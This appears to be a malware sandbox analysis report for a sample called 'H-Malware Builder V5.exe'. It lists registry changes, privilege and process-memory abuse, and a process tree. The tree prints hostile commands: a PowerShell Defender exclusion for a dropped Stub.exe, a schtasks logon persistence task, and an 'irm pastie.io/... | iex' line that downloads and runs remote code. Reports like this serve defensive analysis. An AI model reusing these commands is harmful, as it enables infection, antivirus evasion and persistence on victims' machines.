Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting\LastCrashSelfReportTime = "133776929476753252"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1"	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={48F3852C-80C8-4EFC-8BC2-B3FC8C353B59}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4712	SCHTASKS.exe
216	SCHTASKS.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
700	powershell.exe
700	powershell.exe
3360	Stub.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
2744	wmiprvse.exe
2744	wmiprvse.exe
2744	wmiprvse.exe
2744	wmiprvse.exe
2744	wmiprvse.exe
2744	wmiprvse.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
2468	powershell.exe
4688	dllhost.exe
4688	dllhost.exe
2468	powershell.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
2468	powershell.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe
4688	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3684	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	700	powershell.exe
Token: SeIncreaseQuotaPrivilege	700	powershell.exe
Token: SeSecurityPrivilege	700	powershell.exe
Token: SeTakeOwnershipPrivilege	700	powershell.exe
Token: SeLoadDriverPrivilege	700	powershell.exe
Token: SeSystemProfilePrivilege	700	powershell.exe
Token: SeSystemtimePrivilege	700	powershell.exe
Token: SeProfSingleProcessPrivilege	700	powershell.exe
Token: SeIncBasePriorityPrivilege	700	powershell.exe
Token: SeCreatePagefilePrivilege	700	powershell.exe
Token: SeBackupPrivilege	700	powershell.exe
Token: SeRestorePrivilege	700	powershell.exe
Token: SeShutdownPrivilege	700	powershell.exe
Token: SeDebugPrivilege	700	powershell.exe
Token: SeSystemEnvironmentPrivilege	700	powershell.exe
Token: SeRemoteShutdownPrivilege	700	powershell.exe
Token: SeUndockPrivilege	700	powershell.exe
Token: SeManageVolumePrivilege	700	powershell.exe
Token: 33	700	powershell.exe
Token: 34	700	powershell.exe
Token: 35	700	powershell.exe
Token: 36	700	powershell.exe
Token: SeDebugPrivilege	3360	Stub.exe
Token: SeDebugPrivilege	3360	Stub.exe
Token: SeDebugPrivilege	4688	dllhost.exe
Token: SeShutdownPrivilege	3684	Explorer.EXE
Token: SeCreatePagefilePrivilege	3684	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2472	svchost.exe
Token: SeIncreaseQuotaPrivilege	2472	svchost.exe
Token: SeSecurityPrivilege	2472	svchost.exe
Token: SeTakeOwnershipPrivilege	2472	svchost.exe
Token: SeLoadDriverPrivilege	2472	svchost.exe
Token: SeSystemtimePrivilege	2472	svchost.exe
Token: SeBackupPrivilege	2472	svchost.exe
Token: SeRestorePrivilege	2472	svchost.exe
Token: SeShutdownPrivilege	2472	svchost.exe
Token: SeSystemEnvironmentPrivilege	2472	svchost.exe
Token: SeUndockPrivilege	2472	svchost.exe
Token: SeManageVolumePrivilege	2472	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2472	svchost.exe
Token: SeIncreaseQuotaPrivilege	2472	svchost.exe
Token: SeSecurityPrivilege	2472	svchost.exe
Token: SeTakeOwnershipPrivilege	2472	svchost.exe
Token: SeLoadDriverPrivilege	2472	svchost.exe
Token: SeSystemtimePrivilege	2472	svchost.exe
Token: SeBackupPrivilege	2472	svchost.exe
Token: SeRestorePrivilege	2472	svchost.exe
Token: SeShutdownPrivilege	2472	svchost.exe
Token: SeSystemEnvironmentPrivilege	2472	svchost.exe
Token: SeUndockPrivilege	2472	svchost.exe
Token: SeManageVolumePrivilege	2472	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2472	svchost.exe
Token: SeIncreaseQuotaPrivilege	2472	svchost.exe
Token: SeSecurityPrivilege	2472	svchost.exe
Token: SeTakeOwnershipPrivilege	2472	svchost.exe
Token: SeLoadDriverPrivilege	2472	svchost.exe
Token: SeSystemtimePrivilege	2472	svchost.exe
Token: SeBackupPrivilege	2472	svchost.exe
Token: SeRestorePrivilege	2472	svchost.exe
Token: SeShutdownPrivilege	2472	svchost.exe
Token: SeSystemEnvironmentPrivilege	2472	svchost.exe
Token: SeUndockPrivilege	2472	svchost.exe
Token: SeManageVolumePrivilege	2472	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2472	svchost.exe

Suspicious use of SetWindowsHookEx 25 IoCs

pid	Process
2444	Conhost.exe
3196	Conhost.exe
3136	Conhost.exe
1080	Conhost.exe
2108	Conhost.exe
3088	Conhost.exe
3720	Conhost.exe
3476	Conhost.exe
936	Conhost.exe
708	Conhost.exe
1232	Conhost.exe
1952	Conhost.exe
3784	Conhost.exe
748	Conhost.exe
1996	Conhost.exe
1852	Conhost.exe
232	Conhost.exe
4808	Conhost.exe
1004	Conhost.exe
3084	Conhost.exe
4360	Conhost.exe
4432	Conhost.exe
2936	Conhost.exe
1728	Conhost.exe
4644	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 884 wrote to memory of 700	884	H-Malware Builder V5.exe	82
PID 884 wrote to memory of 700	884	H-Malware Builder V5.exe	82
PID 884 wrote to memory of 3360	884	H-Malware Builder V5.exe	87
PID 884 wrote to memory of 3360	884	H-Malware Builder V5.exe	87
PID 884 wrote to memory of 3372	884	H-Malware Builder V5.exe	88
PID 884 wrote to memory of 3372	884	H-Malware Builder V5.exe	88
PID 3360 wrote to memory of 4688	3360	Stub.exe	90
PID 3360 wrote to memory of 4688	3360	Stub.exe	90
PID 3360 wrote to memory of 4688	3360	Stub.exe	90
PID 3360 wrote to memory of 4688	3360	Stub.exe	90
PID 3360 wrote to memory of 4688	3360	Stub.exe	90
PID 3360 wrote to memory of 4688	3360	Stub.exe	90
PID 3360 wrote to memory of 4688	3360	Stub.exe	90
PID 3360 wrote to memory of 4688	3360	Stub.exe	90
PID 3360 wrote to memory of 4688	3360	Stub.exe	90
PID 3360 wrote to memory of 4688	3360	Stub.exe	90
PID 3360 wrote to memory of 4688	3360	Stub.exe	90
PID 3360 wrote to memory of 4408	3360	Stub.exe	91
PID 3360 wrote to memory of 4408	3360	Stub.exe	91
PID 3360 wrote to memory of 216	3360	Stub.exe	93
PID 3360 wrote to memory of 216	3360	Stub.exe	93
PID 3360 wrote to memory of 4712	3360	Stub.exe	94
PID 3360 wrote to memory of 4712	3360	Stub.exe	94
PID 4688 wrote to memory of 620	4688	dllhost.exe	5
PID 4688 wrote to memory of 676	4688	dllhost.exe	7
PID 4688 wrote to memory of 956	4688	dllhost.exe	12
PID 4688 wrote to memory of 324	4688	dllhost.exe	13
PID 4688 wrote to memory of 408	4688	dllhost.exe	14
PID 4688 wrote to memory of 476	4688	dllhost.exe	15
PID 4688 wrote to memory of 628	4688	dllhost.exe	16
PID 4688 wrote to memory of 1048	4688	dllhost.exe	17
PID 4688 wrote to memory of 1116	4688	dllhost.exe	18
PID 4688 wrote to memory of 1152	4688	dllhost.exe	19
PID 4688 wrote to memory of 1168	4688	dllhost.exe	20
PID 4688 wrote to memory of 1180	4688	dllhost.exe	21
PID 4688 wrote to memory of 1208	4688	dllhost.exe	22
PID 4688 wrote to memory of 1312	4688	dllhost.exe	24
PID 4688 wrote to memory of 1408	4688	dllhost.exe	25
PID 4688 wrote to memory of 1460	4688	dllhost.exe	26
PID 4688 wrote to memory of 1508	4688	dllhost.exe	27
PID 4688 wrote to memory of 1528	4688	dllhost.exe	28
PID 4688 wrote to memory of 1536	4688	dllhost.exe	29
PID 4688 wrote to memory of 1556	4688	dllhost.exe	30
PID 4688 wrote to memory of 1720	4688	dllhost.exe	31
PID 4688 wrote to memory of 1776	4688	dllhost.exe	32
PID 4688 wrote to memory of 1896	4688	dllhost.exe	33
PID 4688 wrote to memory of 1908	4688	dllhost.exe	34
PID 4688 wrote to memory of 1916	4688	dllhost.exe	35
PID 4688 wrote to memory of 2032	4688	dllhost.exe	36
PID 4688 wrote to memory of 1524	4688	dllhost.exe	37
PID 4688 wrote to memory of 2140	4688	dllhost.exe	38
PID 4688 wrote to memory of 2260	4688	dllhost.exe	40
PID 4688 wrote to memory of 2344	4688	dllhost.exe	41
PID 4688 wrote to memory of 2472	4688	dllhost.exe	42
PID 4688 wrote to memory of 2592	4688	dllhost.exe	43
PID 4688 wrote to memory of 2600	4688	dllhost.exe	44
PID 4688 wrote to memory of 2736	4688	dllhost.exe	45
PID 4688 wrote to memory of 2752	4688	dllhost.exe	46
PID 4688 wrote to memory of 2808	4688	dllhost.exe	47
PID 4688 wrote to memory of 2860	4688	dllhost.exe	48
PID 4688 wrote to memory of 2872	4688	dllhost.exe	49
PID 4688 wrote to memory of 2880	4688	dllhost.exe	50
PID 4688 wrote to memory of 2896	4688	dllhost.exe	51
PID 4688 wrote to memory of 3068	4688	dllhost.exe	52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:620
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1048
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2040b6c4-4567-4cfa-ba81-a319d15eb9c3}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4688

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:324

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:476

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1168

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1180

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1460
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1556
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1524

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2140

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2260

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2808

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2896

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3592

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3684
- C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:884
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:700
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3360
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
      4⤵
      PID:4408
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        5⤵
        
        PID:4928
  - - C:\Windows\SYSTEM32\SCHTASKS.exe
      "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:216
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:232
  - - C:\Windows\SYSTEM32\SCHTASKS.exe
      "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4712
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1240
- - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    PID:3372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2468
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      PID:876
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4360
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3196
    - - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        5⤵
        Checks computer location settings
        Drops startup file
        
        PID:4448
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3828
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3136
      - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        6⤵
        Checks computer location settings
        Drops startup file
        
        PID:4912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:376
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:652
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        7⤵
        Checks computer location settings
        Drops startup file
        
        PID:2000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4024
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:4792
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        8⤵
        Checks computer location settings
        Drops startup file
        
        PID:1224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:64
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        9⤵
        Checks computer location settings
        Drops startup file
        
        PID:3664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3064
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:3452
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        10⤵
        Checks computer location settings
        Drops startup file
        
        PID:3032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2948
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        11⤵
        Checks computer location settings
        Drops startup file
        
        PID:4044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2708
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:4820
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        12⤵
        Checks computer location settings
        Drops startup file
        
        PID:4740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:376
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        13⤵
        Checks computer location settings
        Drops startup file
        
        PID:1576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3832
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
